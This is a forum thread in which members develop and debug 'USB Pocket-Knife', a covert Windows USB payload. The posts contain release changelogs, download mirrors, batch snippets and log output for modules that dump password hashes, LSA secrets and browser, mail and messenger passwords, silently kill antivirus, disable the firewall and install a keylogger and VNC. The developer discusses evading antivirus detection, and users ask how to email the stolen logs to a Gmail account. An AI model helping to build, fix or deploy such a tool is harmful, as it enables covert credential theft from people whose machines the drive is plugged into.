USB Pocket-Knife Development

[Leapo]

This is going to be one hell of a bug fix release. You have no idea how big of a help you've been Tmbomber!

So far the following has been corrected:

• Bug Fix - Animation_1.cfg was missing, causing some features of menu.bat to malfunction.
• Bug Fix - Fixed an ordering issue in Start.bat.
• Bug Fix - Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat
• Bug Fix - Fixed a typo preventing the "Dump Mail Passwords" module from running.
• Bug Fix - Fixed a typo preventing the "Dump Updates-List" module from running.
• Updated - File structure created by slurp was cleaned up.
• Updated - Folder now opens AFTER the payload finishes, now before (if it's selected to open at all).
• Updated - Added a "mad props" section to the ReadMe in honor of Tmbomber!

As for the temp log not being removed (and subsequently causing other problems) I could try adding this before every module, but it's a shot in the dark.

IF EXIST %flshdrv%\LOGS\%computername%\%computername%_TEMP.log DEL /f /q %flshdrv%\LOGS\%computername%\%computername%_TEMP.log

Edit: I very quickly zipped up the payload with the current changes (haven't updated the readme yet, but i did throw in the change log). Give this a try: (link removed, see next post)

Edit2: i figured out why the password apps aren't running silently, i'll have that fixed fairly quickly now.

[Leapo]

UPDATE: VERSION 0.8.5.0 IS OUT!

BUG FIX LIST

There were a LOT of fixes this time around, mad props to Tmbomber for the HUGE amount of help!

• Bug Fix - Animation_1.cfg was missing, causing some features of menu.bat to malfunction.
• Bug Fix - Fixed an ordering issue in Start.bat.
• Bug Fix - Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat
• Bug Fix - Fixed a typo preventing the "Dump Mail Passwords" module from running.
• Bug Fix - Fixed a typo preventing the "Dump Updates-List" module from running.
• Bug Fix - Fixed "Dump Mail passwords" not running correctly.
• Bug Fix - Fixed "Dump Network passwords" not running correctly.
• Bug Fix - Fixed "Dump Messenger passwords" not running correctly.
• Bug Fix - Fixed "Dump LSA Secrets" not running correctly.
• Bug Fix - AVKill Should now operate silently.

Other Changes

• Updated - File structure created by slurp was cleaned up.
• Updated - Folder now opens AFTER the payload finishes, not before (if it's selected to open at all).

DOWNLOAD THE USB POCKET KNIFE V0.8.5.0

includes both U3 and Non-U3 version. The U3 version has the ISO sources but no pre-built ISO. This release is chalk-full of bug fixes, so grab it now!!!

Download Mirrors:

RapidShare, MegaUpload

[Tmbomber]

Ok, first blush...

+----------------------------------+ 
+        [Dump Network PW]         + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+          [Dump Mail PW]          + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+         [Dump Firefox PW]        + 
+----------------------------------+ 
The system cannot find the path specified.
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump IE PW]           + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+       [Dump Messenger PW]        + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump Cache]           + 
+----------------------------------+ 
The system cannot find the path specified.
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump LSA secrets]        + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump Product Keys]       + 
+----------------------------------+ 
The system cannot find the path specified.
<my ip address wuz here>
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump URL History]        + 
+----------------------------------+ 
Input Error: Can not find script file "D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\DUH.vbs".
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump Updates-List]       + 
+----------------------------------+ 
The system cannot find the path specified.
<my ip address wuz here>
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+            [Port Scan]           + 
+----------------------------------+ 
The system cannot find the path specified.
<my ip address wuz here>
----------------------------------------------------------------------------------------------------------------------------- 

This was done on an XP x64 machine. I had several small alert windows pop up saying "Error 5".

Still digging into it.

One note:

Input Error: Can not find script file "D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\DUH.vbs".

referrs to:

	ECHO +----------------------------------+ >> %log% 2>&1
	ECHO +        [Dump URL History]        + >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
		CSCRIPT //nologo %scriptdir%\DUH.vbs >> %log% 2>&1

This was working. I see you've added scriptdir.

scriptdir is defined by:

IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET scriptdir="%flshdrv%\SYSTEM\PROGS\SCRIPT\") 
    ELSE (SET scriptdir=".\SYSTEM\PROGS\SCRIPT\")

I'm using a u3 drive, so the else part is being used. I'm thinking we're already in \system\progs, so that line defined scriptdir as \system\progs\system\progs\script\.

I'm thinking all the "The system cannot find the path specified." are coming from the "CD %progdir%" and "CD %cd%" lines. I think those CD commands need the /d option ("CD /d %progdir%" and "CD /d %cd%") I'm going to go try that now.

[Tmbomber]

...I'm thinking we're already in \system\progs, so that line defined scriptdir as \system\progs\system\progs\script\.

I'm thinking all the "The system cannot find the path specified." are coming from the "CD %progdir%" and "CD %cd%" lines. I think those CD commands need the /d option ("CD /d %progdir%" and "CD /d %cd%") I'm going to go try that now.

< sigh > wrong on both counts.

It's late & I'm sleepy. I'll give it another look tomorrow.

Night guys, & thanks Leapo for the Mad Props :)

[Combat Wombat]

wow yeah.. mine didnt work well. so im gonna try the new new update.. i couldn't even get basic external ip addresses to pop up.. neat packaging however, i use it to piddle with my own personal network... don't really see the hacker in using it elsewhere .. feels like a cracker, but as a usfull tool in learning how to work with ones on things.. i like it.. good job putting this together guys! especially you leapo! good work

[Combat Wombat]

hey.. *BUG*****????

when i ran the u3 updated v. im not getting hardly any of the info, plus several of the secrets programs are opening in GUIs instead of just printing to the log.. i dunno if it is the build or just my setup of something.. but it is really freaking out on me!

[Leapo]

Tmbomber: Maybe it's an x64 issue? Do you have the same issues (including No Disk errors with menu.bat) running on normal 32bit Windows XP?

I know FOR SURE that the following modules work and run silently on my system (tested with the non-U3 version of the payload on Windows XP Home Edition SP3 with no active antivirus)

• System Info
• External IP
• Dump Wifi Hex
• Dump SAM (PwDump)
• Dump SAM (FgDump)
• Dump network PW
• Dump Mail PW
• Dump Firefox PW (now works with Firefox 3.0)
• Dump IE PW
• Dump Messenger PW
• Dump Cache (put it in verbose mode, so if it fails it'll tell you why)
• Dump LSA Secrets
• Dump Product Keys
• Dump URL History
• Dump Updates list
• Network services
• Port Scan (Just fixed this)
• Slurp Application Information
• Slurp User Files [Large Files]

I haven't tested the following:

• New silent AVkill
• Disable Windows Firewall
• Install Haksaw
• Install VNC
• Install Keyloger
• Install NMAP

Here's a snapshot of my payload as it stands right now, give it a shot: Rapidshare or Megaupload

Edit: bah, tired the payload on another system. Sure enough, a shitload of No-Disk errors cropped up. Now I've got to figure out where those are coming from <_<

Edit2: Also, my attempt to hide AVKill's console window caused it to be detected before it could run. Bugger.

Edit3: Figured out how to make AVKill a little less noticeable, now a prompt only flashes up for a split second. Still working on the No Disk errors.

[Combat Wombat]

**EDIT**

i agree with tmbomber,,, (below this post)

i am using the u3 version as well on both xp and vista

[Tmbomber]

(tested with the non-U3 version of the payload on Windows XP Home Edition SP3 with no active antivirus)

That may be it right there. I'm playing with the U3 version exclusively.

I just downloaded your most resent update. I'll be trying it shortly.

[Matessim]

Kudos for cleaning the dust on this. this works for firefox 3.01 and 3.1? (im using minefield FF beta.)

anyway. gonna try this at home l8r.

i need buy a new usb, last one got taken by school :/

[Combat Wombat]

i need buy a new usb, last one got taken by school :/

What did you do to get it taken? <_< <_<

[Matessim]

i dont wanna talk about it

[Leapo]

That may be it right there. I'm playing with the U3 version exclusively.

I just downloaded your most resent update. I'll be trying it shortly.

Nah man, i tried it on another computer and it throws No Disk errors there. The real question here is why would one computer throw No Disk errors while another doesn't...

Edit: With everything enabled, it throws the No Disk error exactly 9 times every time...there's a clue.

[random_guy07]

can someone please give me specific step-by-step instructions on how to install this program on both a u3 and non u3 usb drive? and also where do i enter the data for the g-mail accounts?

[Swathe]

Works a treat!

[Jen]

Nah man, i tried it on another computer and it throws No Disk errors there. The real question here is why would one computer throw No Disk errors while another doesn't...

Edit: With everything enabled, it throws the No Disk error exactly 9 times every time...there's a clue.

Hi I'm new here, and I would say that I love your payload. However, the No Disk Error, if you disable all the password dumping and the LSA secrets, then it wouldn't show up, or at least that's what happens to me. i'm trying this on my virtual Machine running windows xp home sp2 Hope this helps!

[vanguard]

can someone please give me specific step-by-step instructions on how to install this program on both a u3 and non u3 usb drive? and also where do i enter the data for the g-mail accounts?

Look in this forum. There is a step by step instruction by me.

If it is not clear enough, please ask again, so I can improve it.

Hope this helps.

[Matessim]

Hi I'm new here, and I would say that I love your payload. However, the No Disk Error, if you disable all the password dumping and the LSA secrets, then it wouldn't show up, or at least that's what happens to me. i'm trying this on my virtual Machine running windows xp home sp2 Hope this helps!

Lmao, its like saying if you dont hack the site it wont get hacked!.

its disabling everything good :P

[Leapo]

UPDATE: VERSION 0.8.6.0 IS OUT!

BUG FIX LIST

• Fixed Slurp2 because it wasn't running at all (bad pathnames).
• Payload now works properly on U3 drives again (was broken in 0.8.5.5).
• Fixed an issue that may cause No Disk errors on some systems (might not fix all no disk errors)

Other Changes

• Folder structure had to be modified to make the payload work correctly on U3 drives again.
• Managed to make the drive detection script a heck of a lot smaller and simpler.

DOWNLOAD THE USB POCKET KNIFE V0.8.6.0

includes both U3 and Non-U3 version. The U3 version has the ISO sources but no pre-built ISO.

Download Mirrors: MegaUpload

[random_guy07]

yeah i saw the post but i still would like clearer instructions like first i open folder X and then i click icon Y kind of thing...and also how do i let the program know which gmail account to access and which one to send it too

[random_guy07]

P.S.

also maybe this is because i have not set it up properly but when i try to change settings with menu.bat it doesnt do anything but for a couple of milliseconds shows the message "The system cannot find the file specified" how do i fix this?

[Leapo]

how do i let the program know which gmail account to access and which one to send it too

Allow me to quote the readme:

Begin by running Menu.bat and selecting "Manage Settings and Modules" from the menu. From here you can enable or disable any of the modules that make up this payload, as well as manage "Other Settings" like the e-mail address the payload will send certain logs to (The Haksaw and NMAP for instance)

Run Menu.bat, select "Manage Settings and modules", from the new menu select "Other Settings", in there you'll find the two options fro configuring your email address.

[random_guy07]

thank you that really clears things up for me...and one more thing in the end is the program at all self-propagating because i know there was talk of letting it propagate once but i wasnt clear on if that was made to be a feature oh and i did what you suggested but on both options a popup window says that it cannot find the specified file and it opens up a blank .txt file am i supposed to type the email address and password or what? also i'm sorry for the barrage of questions but im kind of a noob....

[Leapo]

thank you that really clears things up for me...and one more thing in the end is the program at all self-propagating because i know there was talk of letting it propagate once but i wasnt clear on if that was made to be a feature

No, it's not self propagating, too dangerous.

and i did what you suggested but on both options a popup window says that it cannot find the specified file and it opens up a blank .txt file am i supposed to type the email address and password or what? also i'm sorry for the barrage of questions but im kind of a noob....

You need to have the payload extracted to a flash drive (not a folder on your hard disk) before menu.bat will work correctly.

[Tmbomber]

Ok, v0860... Heeeeere we go.....

I found out that PWDump requires a command line option to be set if you're running on an x64 operating system. (something like -O64) I've disabled on my switchblades seeing I work with a mix of x64 and non x64 machines.

+----------------------------------+

+ [Dump URL History] +

+----------------------------------+

Input Error: Can not find script file "M:\SYSTEM\SYSTEM\DUH.vbs".

Hmmm...

ECHO +----------------------------------+ >> %log% 2>&1

ECHO + [Dump URL History] + >> %log% 2>&1

ECHO +----------------------------------+ >> %log% 2>&1

CSCRIPT //nologo %progdir%\DUH.vbs >> %log% 2>&1

That should work ok...

IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\SYSTEM\")

come to think of it, I have a bunch of things not working...

+----------------------------------+ 
+           [External IP]          + 
+----------------------------------+ 

----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+          [Dump Wifi Hex]         + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+         [Dump SAM FGDUMP]        + 
+----------------------------------+ 
Access is denied.

-----Hashes----- 

----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump Network PW]         + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+          [Dump Mail PW]          + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+         [Dump Firefox PW]        + 
+----------------------------------+ 
The system cannot find the path specified.
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump IE PW]           + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+       [Dump Messenger PW]        + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump Cache]           + 
+----------------------------------+ 
The system cannot find the path specified.
----------------------------------------------------------------------------------------------------------------------------- 

and port scan isn't functioning, either.

going to work on it some.